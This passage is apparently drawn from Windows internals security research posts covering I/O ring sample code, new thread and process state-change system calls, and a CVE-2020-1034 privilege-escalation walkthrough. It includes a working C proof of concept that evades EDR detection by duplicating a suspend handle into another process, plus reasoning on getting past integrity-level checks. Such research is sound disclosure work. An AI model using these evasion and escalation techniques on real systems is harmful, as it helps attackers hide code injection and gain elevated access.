    _In_ ULONG EntryCount,
    _In_ PLARGE_INTEGER Timeout
    );

NTSTATUS
NtCreateIoRing (
    _Out_ PHANDLE pIoRingHandle,
    _In_ ULONG CreateParametersSize,
    _In_ PIO_RING_STRUCTV1 CreateParameters,
    _In_ ULONG OutputParametersSize,
    _Out_ PNT_IORING_INFO pRingInfo
    );

NTSTATUS
NtClose (
    _In_ HANDLE Handle
    );

EXTERN_C_END

void IoRingNt ()
{
    NTSTATUS status;
    IO_RING_STRUCTV1 ioringStruct;
    NT_IORING_INFO ioringInfo;
    HANDLE handle = NULL;
    PNT_IORING_SQE sqe;
    LARGE_INTEGER timeout;
    HANDLE hFile = NULL;
    ULONG sizeToRead = 0x200;
    PVOID *buffer = NULL;
    ULONG64 endOfBuffer;

    ioringStruct.IoRingVersion = 1;
    ioringStruct.SubmissionQueueSize = 1;
    ioringStruct.CompletionQueueSize = 1;
    ioringStruct.AdvisoryFlags = IORING_CREATE_ADVISORY_FLAGS_NONE;
    ioringStruct.RequiredFlags = IORING_CREATE_REQUIRED_FLAGS_NONE;

    status = NtCreateIoRing(&handle,
                            sizeof(ioringStruct),
                            &ioringStruct,
                            sizeof(ioringInfo),
                            &ioringInfo);
    if (!NT_SUCCESS(status))
    {
        printf("Failed creating IO ring handle: 0x%x\n", status);
        goto Exit;
    }

    ioringInfo.SubQueueBase->Tail = 1;
    ioringInfo.SubQueueBase->Head = 0;
    ioringInfo.SubQueueBase->Flags = 0;

    hFile = CreateFile(L"C:\\Windows\\System32\\notepad.exe",
                       GENERIC_READ,
                       0,
                       NULL,
                       OPEN_EXISTING,
                       FILE_ATTRIBUTE_NORMAL,
                       NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("Failed opening file handle: 0x%x\n", GetLastError());
        goto Exit;
    }

    sqe = (PNT_IORING_SQE)((ULONG64)ioringInfo.SubQueueBase + sizeof(IORING_QUEUE_HEAD));
    sqe->Opcode = 1;
    sqe->Flags = 0;
    sqe->FileRef = hFile;
    sqe->FileOffset.QuadPart = 0;
    buffer = (PVOID*)VirtualAlloc(NULL, sizeToRead, MEM_COMMIT, PAGE_READWRITE);
    if (buffer == NULL)
    {
        printf("Failed allocating memory\n");
        goto Exit;
    }
    sqe->Buffer = buffer;
    sqe->BufferOffset = 0;
    sqe->BufferSize = sizeToRead;
    sqe->Key = 1234;
    sqe->UserData = nullptr;

    timeout.QuadPart = -10000;

    status = NtSubmitIoRing(handle, IORING_CREATE_REQUIRED_FLAGS_NONE, 1, &timeout);
    if (!NT_SUCCESS(status))
    {
        printf("Failed submitting IO ring: 0x%x\n", status);
        goto Exit;
    }
    printf("Data from file:\n");
    endOfBuffer = (ULONG64)buffer + sizeToRead;
    //
    // Iterate with a separate pointer so buffer still points at the base of
    // the allocation and can be passed to VirtualFree in the cleanup path.
    //
    for (PVOID* current = buffer; (ULONG64)current < endOfBuffer; current++)
    {
        printf("%p ", *current);
    }
    printf("\n");

Exit:
    if (handle)
    {
        NtClose(handle);
    }
    if (hFile)
    {
        NtClose(hFile);
    }
    if (buffer)
    {
        VirtualFree(buffer, NULL, MEM_RELEASE);
    }
}

void IoRingKernelBase ()
{
    HRESULT result;
    HIORING handle = NULL;
    IORING_CREATE_FLAGS flags;
    IORING_HANDLE_REF requestDataFile;
    IORING_BUFFER_REF requestDataBuffer;
    UINT32 submittedEntries;
    HANDLE hFile = NULL;
    ULONG sizeToRead = 0x200;
    PVOID *buffer = NULL;
    ULONG64 endOfBuffer;

    flags.Required = IORING_CREATE_REQUIRED_FLAGS_NONE;
    flags.Advisory = IORING_CREATE_ADVISORY_FLAGS_NONE;
    result = CreateIoRing(IORING_VERSION_1, flags, 1, 1, &handle);
    if (!SUCCEEDED(result))
    {
        printf("Failed creating IO ring handle: 0x%x\n", result);
        goto Exit;
    }

    hFile = CreateFile(L"C:\\Windows\\System32\\notepad.exe",
                       GENERIC_READ,
                       0,
                       NULL,
                       OPEN_EXISTING,
                       FILE_ATTRIBUTE_NORMAL,
                       NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        printf("Failed opening file handle: 0x%x\n", GetLastError());
        goto Exit;
    }
    requestDataFile.Kind = IORING_REF_RAW;
    requestDataFile.Handle = hFile;
    requestDataBuffer.Kind = IORING_REF_RAW;
    buffer = (PVOID*)VirtualAlloc(NULL,
                                  sizeToRead,
                                  MEM_COMMIT,
                                  PAGE_READWRITE);
    if (buffer == NULL)
    {
        printf("Failed to allocate memory\n");
        goto Exit;
    }
    requestDataBuffer.Buffer = buffer;
    result = BuildIoRingReadFile(handle,
                                 requestDataFile,
                                 requestDataBuffer,
                                 sizeToRead,
                                 0,
                                 NULL,
                                 IOSQE_FLAGS_NONE);
    if (!SUCCEEDED(result))
    {
        printf("Failed building IO ring read file structure: 0x%x\n", result);
        goto Exit;
    }

    result = SubmitIoRing(handle, 1, 10000, &submittedEntries);
    if (!SUCCEEDED(result))
    {
        printf("Failed submitting IO ring: 0x%x\n", result);
        goto Exit;
    }
    printf("Data from file:\n");
    endOfBuffer = (ULONG64)buffer + sizeToRead;
    //
    // Iterate with a separate pointer so buffer still points at the base of
    // the allocation and can be passed to VirtualFree in the cleanup path.
    //
    for (PVOID* current = buffer; (ULONG64)current < endOfBuffer; current++)
    {
        printf("%p ", *current);
    }
    printf("\n");

Exit:
    if (handle != 0)
    {
        CloseIoRing(handle);
    }
    if (hFile)
    {
        NtClose(hFile);
    }
    if (buffer)
    {
        VirtualFree(buffer, NULL, MEM_RELEASE);
    }
}

int main ()
{
    IoRingKernelBase();
    IoRingNt();
    ExitProcess(0);
}

Thread and Process State Change

a.k.a: EDR Hook Evasion – Method #4512

Every couple of weeks a new build of Windows Insider gets released. Some have lots of changes and introduce completely new features, some only have minor bug fixes, and some simply insist on crashing repeatedly for no good reason. A few months ago one of those builds had a few surprising changes — It introduced 2 new object types and 4 new system calls, not something that happens every day. So of course I went investigating. What I discovered is a confusingly over-engineered feature, which was added to solve a problem that could have been solved by much simpler means and which has the side effect of supplying attackers with a new way to evade EDR hooks.

Suspending and Resuming Threads – Now With 2 Extra Steps!

The problem that this feature is trying to solve is this: what happens if a process suspends a thread and then terminates before resuming it? Unless some other part of the system realizes what happened, the thread will remain suspended forever and will never resume its execution. To solve that, this new feature allows suspending and resuming threads and processes through the new object types, which will keep track of the suspension state of the threads or processes. That way, when the object is destroyed (for example, when the process that created it is terminated), the system will reset the state of the target process or thread by suspending or resuming it as needed.

This feature is pretty easy to use – the caller first needs to call NtCreateThreadStateChange (or NtCreateProcessStateChange; both cases are almost identical, but we’ll stay with the thread case for simplicity) to create a new object of type PspThreadStateChangeType. This object type is not documented, but its internal structure looks something like this:

typedef struct _THREAD_STATE_OBJECT
{
    PETHREAD Thread;
    EX_PUSH_LOCK Lock;
    ULONG ThreadSuspendCount;
} THREAD_STATE_OBJECT, *PTHREAD_STATE_OBJECT;

NtCreateThreadStateChange has the following prototype:

NTSTATUS
NtCreateThreadStateChange (
    _Out_ PHANDLE StateChangeHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ POBJECT_ATTRIBUTES ObjectAttributes,
    _In_ HANDLE ThreadHandle,
    _In_ ULONG Unused
);

The 2 arguments we are interested in are the first one, which will receive a handle to the new object, and the fourth – a handle to the thread that will be referenced by the structure. Any future suspend or resume operation that will be done through this object can only work on the thread that’s being passed into this function. NtCreateThreadStateChange will create a new object instance, set the thread pointer to the requested thread, and initialize the lock and count fields to zero.

When calling NtCreateProcessStateChange to operate on a process, the thread handle will be replaced with a process handle and the object that will be created will be of type PspProcessStateChangeType. The only change in the structure is that the ETHREAD pointer is replaced with an EPROCESS pointer.

The next step is calling NtChangeThreadState (or NtChangeProcessState, if operating on a process). This function receives a handle to the thread state change object, a handle to the same thread that was passed when creating the object, and an action, which is an enum value:

typedef enum _THREAD_STATE_CHANGE_TYPE
{
    ThreadStateChangeSuspend = 0,
    ThreadStateChangeResume = 1,
    ThreadStateChangeMax = 2,
} THREAD_STATE_CHANGE_TYPE, *PTHREAD_STATE_CHANGE_TYPE;

typedef enum _PROCESS_STATE_CHANGE_TYPE
{
    ProcessStateChangeSuspend = 0,
    ProcessStateChangeResume = 1,
    ProcessStateChangeMax = 2,
} PROCESS_STATE_CHANGE_TYPE, *PPROCESS_STATE_CHANGE_TYPE;

It also receives an “Extended Information” variable and its length, both of which are unused and must be zero, and another reserved argument that must also be zero. The function will validate that the thread pointed to by the thread state change object is the same as the thread whose handle was passed into the function, and then call the appropriate function based on the requested action – PsSuspendThread or PsMultiResumeThread. Then it will increment or decrement the ThreadSuspendCount field based on the action that was performed. There are 2 limitations enforced by the suspend count:

  1. A thread cannot be resumed if the object’s ThreadSuspendCount is zero, even if the thread is currently suspended. It must be suspended and resumed using the state change API, otherwise things will start acting funny.
  2. A thread cannot be suspended if ThreadSuspendCount is 0x7FFFFFFF. This is meant to avoid overflowing the counter. However, this is a weird limitation since KeSuspendThread (the internal function called from PsSuspendThread) already enforces a suspension limit of 127 through the thread’s SuspendCount field, and will return STATUS_SUSPEND_COUNT_EXCEEDED if the count exceeds that limit.
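
To make the flow concrete, here is a minimal sketch of the thread case. These functions aren’t declared in any public header, so the sketch resolves them from ntdll at runtime; the NtChangeThreadState prototype is assumed to mirror the NtChangeProcessState one used in the PoC at the end of this section, so treat it as a best guess rather than an official definition:

#include <Windows.h>
#include <winternl.h>

#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

typedef NTSTATUS (NTAPI *PFN_NtCreateThreadStateChange) (
    PHANDLE StateChangeHandle, ACCESS_MASK DesiredAccess, PVOID ObjectAttributes,
    HANDLE ThreadHandle, ULONG Unused);

//
// Assumed to mirror NtChangeProcessState - not an official prototype.
//
typedef NTSTATUS (NTAPI *PFN_NtChangeThreadState) (
    HANDLE StateChangeHandle, HANDLE ThreadHandle, ULONG Action,
    PVOID ExtendedInformation, SIZE_T ExtendedInformationLength, ULONG64 Reserved);

//
// Suspends the target thread through a state change object and returns the
// object handle. Closing that handle (or exiting without closing it) is what
// eventually resumes the thread.
//
HANDLE SuspendThreadViaStateChange (HANDLE threadHandle)
{
    HANDLE stateChange = NULL;
    NTSTATUS status;
    HMODULE ntdll = GetModuleHandleW(L"ntdll.dll");
    PFN_NtCreateThreadStateChange pNtCreateThreadStateChange =
        (PFN_NtCreateThreadStateChange)GetProcAddress(ntdll, "NtCreateThreadStateChange");
    PFN_NtChangeThreadState pNtChangeThreadState =
        (PFN_NtChangeThreadState)GetProcAddress(ntdll, "NtChangeThreadState");

    if ((pNtCreateThreadStateChange == NULL) || (pNtChangeThreadState == NULL))
    {
        return NULL;    // not available on this build
    }

    status = pNtCreateThreadStateChange(&stateChange,
                                        MAXIMUM_ALLOWED,
                                        NULL,
                                        threadHandle,
                                        0);
    if (!NT_SUCCESS(status))
    {
        return NULL;
    }

    //
    // ThreadStateChangeSuspend == 0; the extended information and reserved
    // arguments must be zero.
    //
    status = pNtChangeThreadState(stateChange, threadHandle, 0, NULL, 0, 0);
    if (!NT_SUCCESS(status))
    {
        CloseHandle(stateChange);
        return NULL;
    }
    return stateChange;
}

The process case looks the same, just with NtCreateProcessStateChange and NtChangeProcessState, as the full PoC later in this section shows.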

So far this works like the classic suspend and resume mechanism, just with a few extra steps. A caller still needs to make an API call to suspend a thread or process and another one to resume it.  But the benefit of having new object types is that objects can have kernel routines that get called for certain operations related to the object, such as open, close and delete:

dx (*(nt!_OBJECT_TYPE**)&nt!PspThreadStateChangeType)->TypeInfo
    (*(nt!_OBJECT_TYPE**)&nt!PspThreadStateChangeType)->TypeInfo                 [Type: _OBJECT_TYPE_INITIALIZER]
    [+0x000] Length           : 0x78 [Type: unsigned short]
    [+0x002] ObjectTypeFlags  : 0x6 [Type: unsigned short]
    [+0x002 ( 0: 0)] CaseInsensitive  : 0x0 [Type: unsigned char]
    [+0x002 ( 1: 1)] UnnamedObjectsOnly : 0x1 [Type: unsigned char]
    [+0x002 ( 2: 2)] UseDefaultObject : 0x1 [Type: unsigned char]
    [+0x002 ( 3: 3)] SecurityRequired : 0x0 [Type: unsigned char]
    [+0x002 ( 4: 4)] MaintainHandleCount : 0x0 [Type: unsigned char]
    [+0x002 ( 5: 5)] MaintainTypeList : 0x0 [Type: unsigned char]
    [+0x002 ( 6: 6)] SupportsObjectCallbacks : 0x0 [Type: unsigned char]
    [+0x002 ( 7: 7)] CacheAligned     : 0x0 [Type: unsigned char]
    [+0x003 ( 0: 0)] UseExtendedParameters : 0x0 [Type: unsigned char]
    [+0x003 ( 7: 1)] Reserved         : 0x0 [Type: unsigned char]
    [+0x004] ObjectTypeCode   : 0x0 [Type: unsigned long]
    [+0x008] InvalidAttributes : 0x92 [Type: unsigned long]
    [+0x00c] GenericMapping   [Type: _GENERIC_MAPPING]
    [+0x01c] ValidAccessMask  : 0x1f0001 [Type: unsigned long]
    [+0x020] RetainAccess     : 0x0 [Type: unsigned long]
    [+0x024] PoolType         : PagedPool (1) [Type: _POOL_TYPE]
    [+0x028] DefaultPagedPoolCharge : 0x70 [Type: unsigned long]
    [+0x02c] DefaultNonPagedPoolCharge : 0x0 [Type: unsigned long]
    [+0x030] DumpProcedure    : 0x0 [Type: void (__cdecl*)(void *,_OBJECT_DUMP_CONTROL *)]
    [+0x038] OpenProcedure    : 0x0 [Type: long (__cdecl*)(_OB_OPEN_REASON,char,_EPROCESS *,void *,unsigned long *,unsigned long)]
    [+0x040] CloseProcedure   : 0x0 [Type: void (__cdecl*)(_EPROCESS *,void *,unsigned __int64,unsigned __int64)]
    [+0x048] DeleteProcedure  : 0xfffff80265650d20 [Type: void (__cdecl*)(void *)]
    [+0x050] ParseProcedure   : 0x0 [Type: long (__cdecl*)(void *,void *,_ACCESS_STATE *,char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,_SECURITY_QUALITY_OF_SERVICE *,void * *)]
    [+0x050] ParseProcedureEx : 0x0 [Type: long (__cdecl*)(void *,void *,_ACCESS_STATE *,char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,_SECURITY_QUALITY_OF_SERVICE *,_OB_EXTENDED_PARSE_PARAMETERS *,void * *)]
    [+0x058] SecurityProcedure : 0xfffff802656bffd0 [Type: long (__cdecl*)(void *,_SECURITY_OPERATION_CODE,unsigned long *,void *,unsigned long *,void * *,_POOL_TYPE,_GENERIC_MAPPING *,char)]
    [+0x060] QueryNameProcedure : 0x0 [Type: long (__cdecl*)(void *,unsigned char,_OBJECT_NAME_INFORMATION *,unsigned long,unsigned long *,char)]
    [+0x068] OkayToCloseProcedure : 0x0 [Type: unsigned char (__cdecl*)(_EPROCESS *,void *,void *,char)]
    [+0x070] WaitObjectFlagMask : 0x0 [Type: unsigned long]
    [+0x074] WaitObjectFlagOffset : 0x0 [Type: unsigned short]
    [+0x076] WaitObjectPointerOffset : 0x0 [Type: unsigned short]

PspThreadStateChangeType has 2 registered procedures – the security procedure, which is SeDefaultObjectMethod and not too interesting to look at in this case as it is the default function, and the delete procedure, which is PspDeleteThreadStateChange. This function will get called every time a thread state change object is destroyed, and does a pretty simple thing:

If the target thread has a non-zero ThreadSuspendCount, the function will resume it as many times as it was suspended. As you can imagine, the process state change object also registers a delete procedure, PspDeleteProcessStateChange, which does something very similar.
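
In rough pseudocode, using the assumed _THREAD_STATE_OBJECT layout from earlier, the thread version boils down to something like this (a reconstruction of the described behavior, not actual kernel source; the internal resume routine it calls is an assumption):

VOID
PspDeleteThreadStateChange (
    _In_ PVOID Object
    )
{
    PTHREAD_STATE_OBJECT stateObject = (PTHREAD_STATE_OBJECT)Object;

    //
    // Undo every suspend that was issued through this object, so the target
    // thread isn't left suspended forever once the object goes away.
    //
    while (stateObject->ThreadSuspendCount != 0)
    {
        PsResumeThread(stateObject->Thread, NULL);  // assumed resume routine
        stateObject->ThreadSuspendCount--;
    }
}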

New System Calls == New EDR Bypass

This is a nice, if slightly over-complicated, solution to the problem, but it has the unexpected side-effect of creating new and undocumented APIs to suspend and resume processes and threads. Since suspend and resume are very useful operations for attackers wishing to inject code, the well-known NtSuspendThread/Process and NtResumeThread/Process APIs are some of the first system calls that are hooked by security solutions, hoping to detect those attacks.

Having new APIs that perform the same operations without going through the well-known and often-monitored system calls is a great chance for attackers to avoid detection by security solutions that don’t keep up with recent changes (though I’m sure all EDR solutions have already started monitoring these new functions and have been doing so since this build was released. Right…?).

There is still a way to keep those same detections without following all of Microsoft’s recent code changes – even though this feature adds new system calls, the internal kernel mechanism invoked by them remains the same. And in Windows 10, this mechanism uses a feature whose sole purpose is to help security solutions gain more information about the system and move them away from relying on user-mode hooks – ETW tracing. More specifically, the Threat Intelligence ETW channel that was added specifically for security purposes. That channel notifies about events that are often interesting to security products, such as virtual memory protection changes, virtual memory writes, driver loads, and, as you probably already guessed, suspending and resuming threads and processes. EDRs that register for these ETW events and use them as part of their detection will not miss any event due to the new state change APIs since these events will be received in either case. Those that don’t use them yet should probably open some Jira tickets that will be forgotten until this technique is found in the wild.

1 EDR Bypass + Windows Internals = 2 EDR Bypasses

However, this feature does create another interesting EDR bypass. As I mentioned, the suspended process or thread will automatically be resumed when the state change object gets destroyed. Normally, this would happen when the process that created the object either closes the only handle to it or exits – this automatically destroys all open handles held by the process. But an object only gets destroyed when all handles to it are closed and there are no more references to it. This means that if another process has an open handle to the state change object it won’t get destroyed when the process that created it exits, and the suspended process or thread won’t be resumed until the second process exits. This shouldn’t happen under normal circumstances, but if a process duplicates its handle to a state change object into another process, it can safely exit without resuming the suspended process or thread.

But why would a process want to do that?

The ETW events that report that a process is being suspended or resumed contain the process ID of the process that performed the action – this way the EDR that consumes the event can correlate different events together and attribute them to a potentially malicious process. In this case, the PID would be the ID of the process in whose context the action happened. So let’s say we create a process that suspends another process through a state change object, then duplicates the handle into a third process and exits. The process state change object doesn’t get destroyed yet since there is still a running process with an open handle to it. Only when the other process exits does the duplicated handle get closed and the suspended process get resumed. But since the resume action happened in the context of the second process, which had nothing to do with the suspend action, that is the PID that will appear in the ETW event.

So, in this proposed scenario, a process will get suspended and later resumed, and ETW events will still be thrown for both actions. But these events will have happened in the context of 2 different processes so they will be difficult to link together, and it will be even more difficult to attribute the resume action to the first process without knowledge of this exact scenario. And we can be even smarter – a lot of security products ignore operations that are attributed to certain system processes. This makes sense, since those processes are not expected to be malicious but might have suspicious-looking activity, so it is easier to ignore them unless there is clear indication of code injection, to avoid false positives.

So we can even choose an innocent-looking Windows process to duplicate our handle into, to maximize the chances that the resume operation will be ignored completely. We just need to find a process that we can open a handle to and that will terminate at some point, to resume our suspended process.

Finally, Code!

In this PoC I simply create 2 notepad.exe processes. One will be suspended using a state change object, and the other will have the handle duplicated inside it. Then the PoC process exits but the suspended notepad remains suspended until the other notepad process is terminated:

#include <Windows.h>
#include <winternl.h>
#include <stdio.h>

#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

//
// From the kernel enum shown earlier in this post.
//
typedef enum _PROCESS_STATE_CHANGE_TYPE
{
    ProcessStateChangeSuspend = 0,
    ProcessStateChangeResume = 1,
    ProcessStateChangeMax = 2,
} PROCESS_STATE_CHANGE_TYPE, *PPROCESS_STATE_CHANGE_TYPE;

//
// Exported by ntdll but not declared in the public headers - link against an
// import library that exports them, or resolve them with GetProcAddress.
//
EXTERN_C_START
NTSTATUS
NTAPI
NtCreateProcessStateChange (
    _Out_ PHANDLE StateChangeHandle,
    _In_ ACCESS_MASK DesiredAccess,
    _In_ PVOID ObjectAttributes,
    _In_ HANDLE ProcessHandle,
    _In_ ULONG Unknown
    );

NTSTATUS
NTAPI
NtChangeProcessState (
    _In_ HANDLE StateChangeHandle,
    _In_ HANDLE ProcessHandle,
    _In_ ULONG Action,
    _In_ PVOID ExtendedInformation,
    _In_ SIZE_T ExtendedInformationLength,
    _In_ ULONG64 Reserved
    );
EXTERN_C_END

int main ()
{
    HANDLE stateChangeHandle = nullptr;
    PROCESS_INFORMATION procInfo = { 0 };
    PROCESS_INFORMATION procInfo2 = { 0 };
    STARTUPINFOW startInfo;
    BOOL result;
    NTSTATUS status;

    ZeroMemory(&startInfo, sizeof(startInfo));
    startInfo.cb = sizeof(startInfo);
    result = CreateProcessW(L"C:\\Windows\\System32\\notepad.exe",
                            NULL,
                            NULL,
                            NULL,
                            FALSE,
                            0,
                            NULL,
                            NULL,
                            &startInfo,
                            &procInfo);
    if (result == FALSE)
    {
        goto Exit;
    }
    CloseHandle(procInfo.hThread);
    result = CreateProcessW(L"C:\\Windows\\System32\\notepad.exe",
                            NULL,
                            NULL,
                            NULL,
                            FALSE,
                            0,
                            NULL,
                            NULL,
                            &startInfo,
                            &procInfo2);
    if (result == FALSE)
    {
        goto Exit;
    }
    CloseHandle(procInfo2.hThread);

    status = NtCreateProcessStateChange(&stateChangeHandle,
                                        MAXIMUM_ALLOWED,
                                        NULL,
                                        procInfo.hProcess,
                                        0);
    if (!NT_SUCCESS(status))
    {
        printf("Failed creating process state change. Status: 0x%x\n", status);
        goto Exit;
    }
    //
    // Action == 0 means Suspend
    //
    status = NtChangeProcessState(stateChangeHandle,
                                  procInfo.hProcess,
                                  ProcessStateChangeSuspend,
                                  NULL,
                                  0,
                                  0);
    if (!NT_SUCCESS(status))
    {
        printf("Failed changing process state. Status: 0x%x\n", status);
        goto Exit;
    }

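    //
    // Duplicate the state change handle into the second notepad. We don't
    // need the duplicated handle value ourselves (which is why lpTargetHandle
    // is NULL); the handle just has to exist in the other process so the
    // object stays alive, and the first notepad stays suspended, after we
    // exit.
    //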
    result = DuplicateHandle(GetCurrentProcess(),
                             stateChangeHandle,
                             procInfo2.hProcess,
                             NULL,
                             NULL,
                             TRUE,
                             DUPLICATE_SAME_ACCESS);
    if (result == FALSE)
    {
        printf("Failed duplicating handle: 0x%x\n", GetLastError());
        goto Exit;
    }

Exit:
    if (procInfo.hProcess != NULL)
    {
        CloseHandle(procInfo.hProcess);
    }
    if (procInfo2.hProcess != NULL)
    {
        CloseHandle(procInfo2.hProcess);
    }
    if (stateChangeHandle != NULL)
    {
        CloseHandle(stateChangeHandle);
    }
    return 0;
}

Like a lot of other cases, this feature started out as a well-intentioned attempt to solve a minor system issue. But an over-engineered design led to multiple security concerns and whole new EDR evasion techniques which turned the relatively small issue into a much larger one.

Exploiting a “Simple” Vulnerability, Part 2 – What If We Made Exploitation Harder?

Introduction

In a previous post I went over vulnerability CVE-2020-1034, which allows arbitrary increment of an address, and saw how we can use some knowledge of ETW internals to exploit it, give our process SeDebugPrivilege and create an elevated process. In this post I will build on that exercise and make things harder by adding some restrictions and difficulties, to see how we can bypass those and still get our wanted result – privilege escalation from a low or medium IL process to a system-level one.

New Limitations

The exploit I wrote in part one works just fine, but let’s imagine that one day a new limitation is added to the kernel that doesn’t let us increment Token.Privileges.Enabled directly, for example by making it a read-only field except for specific kernel code that is meant to modify it.

So, how can we enable a privilege without incrementing the address ourselves?

Enabling Privileges

The answer to that question is pretty simple – we enable them just like a process can enable any other privilege that it owns but is disabled: through RtlAdjustPrivilege, or its advapi32 wrapper, AdjustTokenPrivileges. But here we face a problem: when we try calling RtlAdjustPrivilege to enable our newly-added SeDebugPrivilege, we get back STATUS_PRIVILEGE_NOT_HELD.
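
For reference, this is roughly what that failing call looks like. RtlAdjustPrivilege is undocumented, so the prototype below is the commonly used reverse-engineered one, resolved from ntdll at runtime – treat it as an assumption rather than an official definition:

#include <Windows.h>
#include <winternl.h>
#include <stdio.h>

//
// Undocumented ntdll export; this is the commonly used reverse-engineered
// prototype, not an official one.
//
typedef NTSTATUS (NTAPI *PFN_RtlAdjustPrivilege) (
    ULONG Privilege, BOOLEAN Enable, BOOLEAN CurrentThread, PBOOLEAN WasEnabled);

int main (void)
{
    BOOLEAN wasEnabled = FALSE;
    NTSTATUS status;
    PFN_RtlAdjustPrivilege pRtlAdjustPrivilege =
        (PFN_RtlAdjustPrivilege)GetProcAddress(GetModuleHandleW(L"ntdll.dll"),
                                               "RtlAdjustPrivilege");

    if (pRtlAdjustPrivilege == NULL)
    {
        return 1;
    }

    //
    // SeDebugPrivilege is LUID 20 (which is where the 1 << 20 bit mentioned
    // below comes from). With a medium IL token this returns
    // STATUS_PRIVILEGE_NOT_HELD (0xC0000061), even after the exploit has
    // already added the privilege to Privileges.Present.
    //
    status = pRtlAdjustPrivilege(20, TRUE, FALSE, &wasEnabled);
    printf("RtlAdjustPrivilege returned 0x%08x\n", (unsigned int)status);
    return 0;
}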

To understand why this is happening we’ll have to take a look inside the very ugly and not very readable kernel functions that are in charge of enabling privileges in a token. To try and enable a privilege RtlAdjustPrivilege uses the system call NtAdjustPrivilegesToken, which calls the function SepAdjustPrivileges. This function first checks if a process is running with high, medium or low integrity level. If it has high IL, it can enable any privilege that it owns. However if it’s running with medium IL, we reach the following check:

Each requested privilege is checked against this constant value, representing the privileges that medium IL processes are not allowed to have. The value of SeDebugPrivilege is 0x100000 (1 << 20), and we can see it’s one of the denied options, so it cannot be enabled for processes that aren’t running with at least high integrity level. If we choose to run our process as low IL or in an AppContainer, those have similar checks with even more restrictive values. As usual, the easy options failed early. However, there are always ways around those problems; we just need to look a bit deeper into the operating system to find them.

Fake EoP Leading to Real EoP

We need to have a high or System-IL process to enable debug privilege, but we were planning to use our new debug privilege to elevate ourselves (or our child process, to be exact) to System… So, we’re stuck, right?

Wrong. We don’t actually need a high or system-IL process, just a high or system-IL token. A process doesn’t always have to use the token it was created with. Threads can impersonate any token they have a handle to, including ones with higher integrity levels. Still, to do that we will need a handle to a process with higher IL than us, in order to duplicate its token and impersonate it. And to open a handle to such a process we’ll need to already have some privilege we don’t have, like debug privilege… and we’re stuck in a loop.

But as I learned from the many lawyers in my family (we are a good Jewish family after all, and no one wanted to be a doctor so we had to compensate) – every loop has a loophole, and this one is no different. We don’t need a handle to the token of a different process if we can cheat and create a token that matches the requirements ourselves!

To understand how that is possible we need to learn a bit about the Windows security model and how integrity levels work. To convince you to get through another 500 words of internals information I’ll tell you that Alex and I showed this idea to James Forshaw and he thought it was cool. And if he thinks it’s cool that should be a good enough reason for you to read through my rants until I finally circle back to the actual idea. And now to some internals stuff:

Tokens, Integrity Levels and Why an Unprotected Array is an Exploiter’s Best Friend

To check the integrity level of a token we need to look at a field named IntegrityLevelIndex inside the TOKEN structure. We can dump it for our process and see what it contains:

dx ((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->IntegrityLevelIndex
((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->IntegrityLevelIndex : 0xe [Type: unsigned long]

Like the name suggests, this value on its own doesn’t tell us much because it’s only an index inside an array of SID_AND_ATTRIBUTES structures, pointed to by the UserAndGroups field. We can verify this by looking at SepLocateTokenIntegrity, which is called by SepAdjustPrivileges to determine the integrity level of the token whose privileges it’s adjusting:

This array has multiple entries, the exact number of which changes between different processes. We can tell how many there are using the UserAndGroupCount field:

dx ((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroupCount
((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroupCount : 0xf [Type: unsigned long]
dx -g *((nt!_SID_AND_ATTRIBUTES(*)[0xf])((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroups)

This is cool and everything, but what does this actually mean and how does it help us fix our broken exploit?

Like the name suggests, a SID_AND_ATTRIBUTES structure contains a security identifier (SID) and specific attributes for it. These attributes depend on the type of data we’re working with; in this case we can find the meaning of these attributes here. The security identifier part of the structure is the one telling us which user and groups this token belongs to. This piece of information determines what integrity level the token has and what it can and cannot do on the system. For example, only some groups can have access to certain processes and files, and in the previous blog post we learned that most GUIDs only allow certain groups to register them. SIDs have the format of S-1-X-…, which makes them easy to identify.
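
For reference, the structure itself is small – this is its layout as defined in winnt.h (the comments are mine):

typedef struct _SID_AND_ATTRIBUTES
{
    PSID Sid;           // the security identifier itself
    DWORD Attributes;   // flags whose meaning depends on where the entry is used
} SID_AND_ATTRIBUTES, *PSID_AND_ATTRIBUTES;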

We can improve our WinDbg query to show all the groups that our token is a part of in a convenient format:

dx -s @$sidAndAttr = *((nt!_SID_AND_ATTRIBUTES(*)[0xf])((nt!_TOKEN*)(@$curprocess.KernelObject.Token.Object & ~0xf))->UserAndGroups)
dx -g @$sidAndAttr.Select(s => new {Attributes = s->Attributes, Sid = Debugger.Utility.Control.ExecuteCommand("!sid " + ((__int64)(s->Sid)).ToDisplayString("x"))[0].Remove(0, 8)})

The entry that our token is pointing to, at 0xe, is the last one in the table, and it’s the SID for medium integrity level, which is the reason we can’t enable our debug privilege. However, the design of this system gives us a way to bypass our integrity level issue. The UserAndGroups field points to the array, but the array itself is allocated immediately after the TOKEN structure. And this is not the last thing in this memory block. If we dump the TOKEN structure we can see that right after the UserAndGroups field there is another pointer to an array of the same format, called RestrictedSids:

[+0x098] UserAndGroups    : 0xffffad8914e1e4f0 [Type: _SID_AND_ATTRIBUTES *]    
[+0x0a0] RestrictedSids   : 0x0 [Type: _SID_AND_ATTRIBUTES *]

Restricted tokens are a way to limit the access that a certain process or thread will have by only allowing the token to access objects whose ACL specifically allows access to that SID. For example, if a token has a restricted SID for “Bob”, then the process or thread using this token can only access files if they explicitly allow access to “Bob”. Even if “Bob” is part of a group that is allowed to access the file (like Users or Everyone), it will be denied access unless the file “knows” in advance that “Bob” will try to access it and adds the SID to its ACL. This capability is sometimes used in services to restrict their access only to objects that are necessary for them to use and reduce the possible attack surface. Restricted tokens can also be used to remove default privileges from a token that doesn’t need them. For example, the BFE service uses a write restricted token. This means it can have read access to any object, but can only get write access to objects which explicitly allow its SID:

There are two important things to know about restricted tokens that make our elevation trick possible:

